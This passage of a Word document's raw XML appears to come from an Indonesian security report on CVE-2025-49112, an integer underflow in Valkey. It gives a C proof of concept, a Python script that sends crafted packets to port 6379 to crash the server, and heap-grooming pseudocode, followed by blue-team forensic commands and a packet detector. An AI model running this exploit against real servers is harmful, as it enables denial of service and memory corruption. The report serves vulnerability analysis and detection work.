          <w:p w14:paraId="089F1342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void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process_buffer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(uint32_t size, uint32_t used) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D36C4F5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printf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("\n[TEST] size=%u, used=%u\n", size, used);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28CE8CB7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1D04AED2" wp14:textId="4A0D9165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KODE RENTAN -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persis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seperti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di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networking.c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</w:p>
          <w:p w14:paraId="435D5825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if (size - used &gt; 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="724FB583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printf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("[VULNERABLE PATH] remaining = %u bytes\n", size - used);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="635CB34C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printf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("[DANGER] Ini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seharusnya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tidak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dieksekusi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jika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used &gt;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size!\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n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F01A1CC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} else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337F013C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printf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("[SAFE] Buffer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penuh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atau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tidak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valid\n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3AE923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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE58401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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1895D3B7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2E52951A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int main(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73409882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printf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("=== CVE-2025-49112 Proof of Concept ===");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49FEEA01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printf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("=== Integer Underflow Demo ===\n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FDE0BDC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0FA9820E" wp14:textId="0734CE15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Kasus normal: used &lt; size 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aman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) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C87A09A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process_buffer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(100, 50);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A70762" wp14:textId="7CC9BD7E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 Output: remaining = 50 bytes (BENAR) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1031F9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2127AF87" wp14:textId="3AC67C48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Kasus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berbahaya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: used &gt; size (UNDERFLOW!) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="740AFFD6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process_buffer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(50, 100);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A07E8C" wp14:textId="142F3E2B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 Output: remaining = 4294967246 bytes (SALAH! Wrap-around) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF8A68F" wp14:textId="097EA7A1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Kondisi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if TETAP TRUE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karena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4294967246 &gt; 0 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE745D7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67E9453B" wp14:textId="5C813DEF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 Kasus edge: size == used </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5A2B0C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process_buffer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(100, 100);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="085A84CB" wp14:textId="015E49A6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Output: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remaining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= 0,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kondisi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if FALSE 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aman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) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D149327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192EAFBC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return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4286D95D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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="3A4C3347" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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7BD8335A" wp14:textId="77777777"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Listing 5.2 - Proof of Concept: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Demonstrasi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integer underflow yang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mereplikasi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kondisi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CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70DF9E56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44E871BC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D0DCF0" w:sz="2"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFD"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="144A5D2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8FC9A9A" wp14:editId="7777777">
                  <wp:extent cx="8250000" cy="3479167"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="7712800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0000" cy="347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4EEA54D5" w14:paraId="1C111C51" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:left w:val="single" w:color="D0DCF0" w:sz="2"/>
              <w:bottom w:val="single" w:color="1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDF2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3A2A39" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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Figure 3: Output Proof of Concept - Underflow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menghasilkan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nilai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4,294,967,246 pada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operasi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50 - 100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untuk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uint32_t |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Verifikasi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CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="738610EB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="69008A30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5.4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Eksploitasi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Jaringan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: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Mengirim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Paket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Berbahaya</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="636E5E94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Setelah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underflow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berhasil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didemonstrasikan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secara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terisolasi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langkah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berikutnya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adalah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mereplikasi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kondisi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melalui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koneksi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jaringan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server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Valkey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aktif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. Script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berikut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mengilustrasikan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bagaimana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penyerang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memanipulasi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size dan used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melalui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paket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dikirim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port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Valkey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:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="637805D2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5479235D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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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A7555B" wp14:textId="1D1B0805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# !/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usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B98D6E" wp14:textId="056A9DD9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>CVE-2025-49112 - Network Exploit Demonstrator</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="4C41FF1D" wp14:textId="28785A4E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PERINGATAN: Hanya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penggunaan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pada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sistem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sendiri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dimiliki</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FCC7321" wp14:textId="0D485D4C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dan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diizinkan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secara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eksplisit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.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Penggunaan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tanpa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izin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adalah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ilegal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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253B9705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75B10423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import socket</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="3B1A8311" wp14:textId="77777777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import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struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6307DECA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import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752553BD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:rsidP="4EEA54D5" w14:paraId="620FE5F4" wp14:textId="68881CFE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TARGET_HOST = 'localhost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'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Ganti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target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diizinkan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337D9436" wp14:textId="398875AD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TARGET_PORT = 6379         Port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default</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56051E44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006AC545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def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create_underflow_packet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size_val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,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used_val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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E5600C6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"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BB3286C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Membuat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paket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memanipulasi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nilai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size dan used</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03ABFE8C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memicu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kondisi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integer underflow.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16DA3712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"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13584806" wp14:textId="297B765F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Pack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nilai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sebagai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unsigned 32-bit big-endian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B022A30" wp14:textId="28572113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size_bytes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=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struct.pack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('&gt;I',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size_val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)  &gt; = big-endian, I = uint32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25341888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used_bytes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=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struct.pack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('&gt;I',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used_val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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="03A61E55" wp14:textId="77777777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return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size_bytes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+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used_bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554EF5F4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43EBB88E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def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send_exploit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():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2718CDDD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print(f"[*]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Menghubungkan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{TARGET_HOST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}:{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TARGET_PORT}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6774A6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s =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socket.socket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socket.AF_INET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,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socket.SOCK_STREAM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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A52A0A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s.settimeout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(5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E235B9D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7B28352A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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="082387E8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s.connect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((TARGET_HOST, TARGET_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070F89FE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print(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"[+]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Koneksi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berhasil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")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66AC4DF1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679D69F9" wp14:textId="638F1351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    Paket normal (baseline)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C333DCC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print(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"[*]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Mengirim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paket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normal (size=100, used=50)")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="486CA75E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normal =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create_underflow_packet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(100, 50)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C54E25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s.send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(normal)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F750E16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time.sleep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(0.1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131F8F3A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7DF015BE" wp14:textId="6958A863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Paket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eksploitasi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(used &gt; size = trigger underflow)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B0CEC9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print(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"[*]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Mengirim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paket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eksploitasi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(size=50, used=300)")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152C72B5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exploit =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create_underflow_packet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(50, 300)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B930C76" wp14:textId="1C3DC90E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    size=50, used=300: 50 - 300 = 4294967046 (underflow!)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CA2A16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s.send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(exploit)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="455E230F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04A25935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print(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"[+] Paket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dikirim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. Monitor log server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SIGSEGV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atau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crash")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A8DB014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3B669FE6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except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ConnectionRefusedError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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="304FF4C6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print(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"[-]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Koneksi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ditolak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.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Pastikan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aktif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.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BBEA2F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except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA6FD63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    print(f"[-] Error: {e}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5430FC1C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finally:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C73B7A2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s.close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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D8BA8D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4888C631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if __name__ == '__main__':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C285967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send_exploit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()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="6AEFF10E" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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6A9E159D" wp14:textId="77777777"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Listing 5.3 - Network exploit demonstrator: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pengiriman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paket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manipulasi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trigger underflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="463F29E8" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="0BAF04B0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5.5  Heap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Grooming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untuk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Eksploitasi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yang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Lebih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Reliabel</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="12D45475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Dalam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skenario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eksploitasi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tingkat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lanjut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penyerang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menggunakan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teknik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heap grooming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menempatkan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objek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target (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seperti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function pointer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atau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vtable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) pada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posisi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memori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ditimpa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melalui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out-of-bounds write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diakibatkan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oleh underflow. Teknik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meningkatkan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reliabilitas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eksploitasi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:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3B7B4B86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59030535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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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900E4C" wp14:textId="0A569633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Heap Grooming Concept -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Ilustrasi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Teknis </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39018CCB" wp14:textId="2FED158A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Tujuan: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Mengatur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layout heap agar OOB write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mengenai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target object </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A0658A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1F019B44" wp14:textId="1FBBB5CC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Phase 1: Spray heap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objek-objek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berukuran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tertentu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</w:p>
          <w:p w14:paraId="799ECECE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for (int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= 0;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&lt; 100;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++) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4619A0F4" wp14:textId="7E8EA0E1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Kirim request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mengalokasikan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clientReplyBlock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berukuran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64 bytes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8DF89F" wp14:textId="6A9DCAE6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send_packet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(TARGET, 64, 64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);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size=64, used=64 (buffer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penuh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) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202DEC99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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA285AA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0512F35D" wp14:textId="7D02242A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Phase 2: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Buat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lubang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(hole) pada heap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posisi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objek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target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BED858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for (int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= 0;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&lt; 50;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+= 2) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450EE4C8" wp14:textId="7C001D34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Bebaskan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setiap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objek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genap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membuat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fragmentasi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</w:p>
          <w:p w14:paraId="0718FF60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free_connection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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50CBB65B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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58BC89FB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77679F87" wp14:textId="37A8EA7F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Phase 3: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Alokasikan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objek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target di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lubang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tersedia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</w:p>
          <w:p w14:paraId="0485CDA4" wp14:textId="37FF4EE9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Target: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clientReplyBlock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tepat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setelah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buffer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di-overflow </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A612359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allocate_target_object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(HOLE_POSITION);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70945AB8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3D6F9949" wp14:textId="1FA6FBA2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Phase 4: Trigger underflow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menulis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objek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target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DC3228" wp14:textId="60BEEBF2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send_packet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(TARGET, 50, 300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);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50 - 300 = underflow! </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1758DAAD" wp14:textId="0E9F736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Jika heap grooming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berhasil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, data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penyerang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menimpa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objek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target </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="7B4B338C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidP="4EEA54D5" w14:paraId="1E545116" wp14:textId="77777777">
            <w:pPr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Listing 5.4 -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Konsep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heap grooming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meningkatkan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reliabilitas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eksploitasi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3A0FF5F2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5630AD66" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B6516D5" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB VI: FORENSIC ARTIFACTS DAN DETEKSI SERANGAN</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="7FF834ED" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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6.1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Indikator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Kompromi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pada System Log</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="75F00D27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Ketika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kondisi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integer underflow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memicu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akses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memori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tidak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valid,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sistem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dan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Valkey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sendiri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menghasilkan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sejumlah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artefak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forensik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digunakan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mendeteksi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upaya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eksploitasi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.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Pemahaman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tentang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artefak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kritis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bagi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blue team dan incident responder.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="61829076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556F1D31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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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BA2526" wp14:textId="1B3300AF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Forensic Detection Commands -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Blue Team dan Incident Responders</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FB2F13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7C2332CD" wp14:textId="27FA8722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1.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Periksa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segmentation fault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di system log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223340BA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grep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'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.*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segfault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\|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.*SIGSEGV\|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.*crash' /var/log/syslog</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="610904D7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grep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'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.*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segfault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\|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.*SIGSEGV\|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.*crash' /var/log/kern.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="184D15E4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615BA2E8" wp14:textId="5D0216D8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2.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Periksa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kernel log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memory protection violation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462A2B99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dmesg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| grep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'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\|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segfault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\|general protection'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A420E6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3BD822DD" wp14:textId="05644F59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3. Monitor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koneksi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aktif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port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secara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real-time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7424BD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ss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tnp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| grep ':6379'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68FA6B60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netstat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anp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| grep ':6379'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028EB558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:rsidP="4EEA54D5" w14:paraId="2D41DE4E" wp14:textId="3E85FC75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4. Capture traffic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jaringan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analisis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paket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anomali</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="3B261F83" wp14:textId="1912ED2D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Tanda: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nilai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used &gt; size pada header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paket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F25FC29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tcpdump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lo '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tcp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port 6379' -w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valkey_capture.pcap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-v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66E8DF9A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:rsidP="4EEA54D5" w14:paraId="67A6B3CE" wp14:textId="64219838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5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. Monitor file descriptor dan memory usage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</w:p>
          <w:p w14:paraId="5D025FD4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cat /proc/$(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pgrep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)/status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7D389D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pmap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-x $(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pgrep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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="637F08B6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:rsidP="4EEA54D5" w14:paraId="128FC1A5" wp14:textId="23D1DC06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6.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Periksa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core dump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jika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tersedia</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A94101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ls -la /var/lib/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systemd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/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coredump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/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261E4F94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coredumpctl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info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-server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="317D77ED" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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0C5EAE06" wp14:textId="77777777"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Listing 6.1 -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Perintah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deteksi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forensik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blue team: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mengidentifikasi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artefak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serangan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CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2BA226A1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17AD93B2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D0DCF0" w:sz="2"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFD"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DE4B5B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88F269A" wp14:editId="7777777">
                  <wp:extent cx="8250000" cy="3479167"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="62936649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0000" cy="347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4EEA54D5" w14:paraId="335CC859" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:left w:val="single" w:color="D0DCF0" w:sz="2"/>
              <w:bottom w:val="single" w:color="1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDF2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FB0556" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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Figure 4: Forensic Artifacts - Log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sistem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dan output monitoring yang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mengindikasikan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upaya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eksploitasi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CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66204FF1" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="06CC348E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6.2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Analisis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Traffic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Jaringan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: Pola Paket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Anomali</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6EC78E44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Pada level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jaringan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upaya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eksploitasi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CVE-2025-49112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diidentifikasi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melalui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pola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paket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tidak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normal. Paket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dirancang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memicu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underflow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memiliki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header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tidak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konsisten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, di mana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used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secara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signifikan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melebihi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size.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2DBF0D7D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2D80E2C7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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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4EEA54D5" w14:paraId="3EC5F7FF" wp14:textId="3759BADC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Analisis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PCAP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mendeteksi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paket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anomali</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="0D05B299" wp14:textId="1780879E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Tool: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tshark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atau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Wireshark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filter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berikut</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F93075F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7967374A" wp14:textId="0D85F8B0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Filter Wireshark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paket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mencurigakan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:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="680B274F" wp14:textId="1DA323AC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tcp.port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== 6379 and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tcp.payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E72ADE8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265A35B6" wp14:textId="4018B8A4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Analisis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tshark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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0792D630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tshark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-r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valkey_capture.pcap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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="276D29E3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-Y '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tcp.port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== 6379' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1967AEA4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-T fields \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36126198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-e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frame.number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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414CCF06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-e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ip.src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\</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="14A85B53" wp14:textId="77777777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-e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tcp.payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C7B8B64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4C0E193F" wp14:textId="36CC4C50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Script Python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parse dan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deteksi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paket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anomali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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750EF89A" wp14:textId="34CAED1C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Tanda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merah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: payload byte [0:4] (size) &lt; payload byte [4:8] (used)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43AE226B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from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scapy.all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import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rdpcap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, TCP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="16326F02" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="280" w:lineRule="auto"/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import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struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11596254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293C5856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pkts =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rdpcap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('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valkey_capture.pcap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')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA89F2F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for pkt in pkts:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40320EE3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if TCP in pkt and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pkt[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TCP].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dport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== 6379:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B47DA5C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payload = bytes(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pkt[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TCP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].payload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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F4D54C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if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len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(payload) &gt;= 8:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11543E00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    size =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struct.unpack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('&gt;I',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payload[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0:4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])[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0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D45403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    used =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struct.unpack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('&gt;I',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payload[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4:8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])[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0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D08149A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        if used &gt; size:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48964DDB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           print(f'[ALERT] Paket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anomali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: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src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={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pkt.src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} size={size} used={used}')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="0A70A646" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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72C816C1" wp14:textId="77777777"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Listing 6.2 -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Analisis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PCAP dan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deteksi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paket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anomali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mengindikasikan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eksploitasi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CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B62F1B3" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="3796BC84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6.3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Indikator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Kompromi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(IoC)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Rangkuman</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02F2C34E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4EEA54D5" w14:paraId="2E881B52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B5CBC0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INDIKATOR KOMPROMI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A162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55BCAD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INTERPRETASI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="58274891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6A72C288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System Log: kernel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segfault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atau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SIGSEGV pada proses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-server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:rsidP="4EEA54D5" w14:paraId="5B955EE6" wp14:textId="77777777">
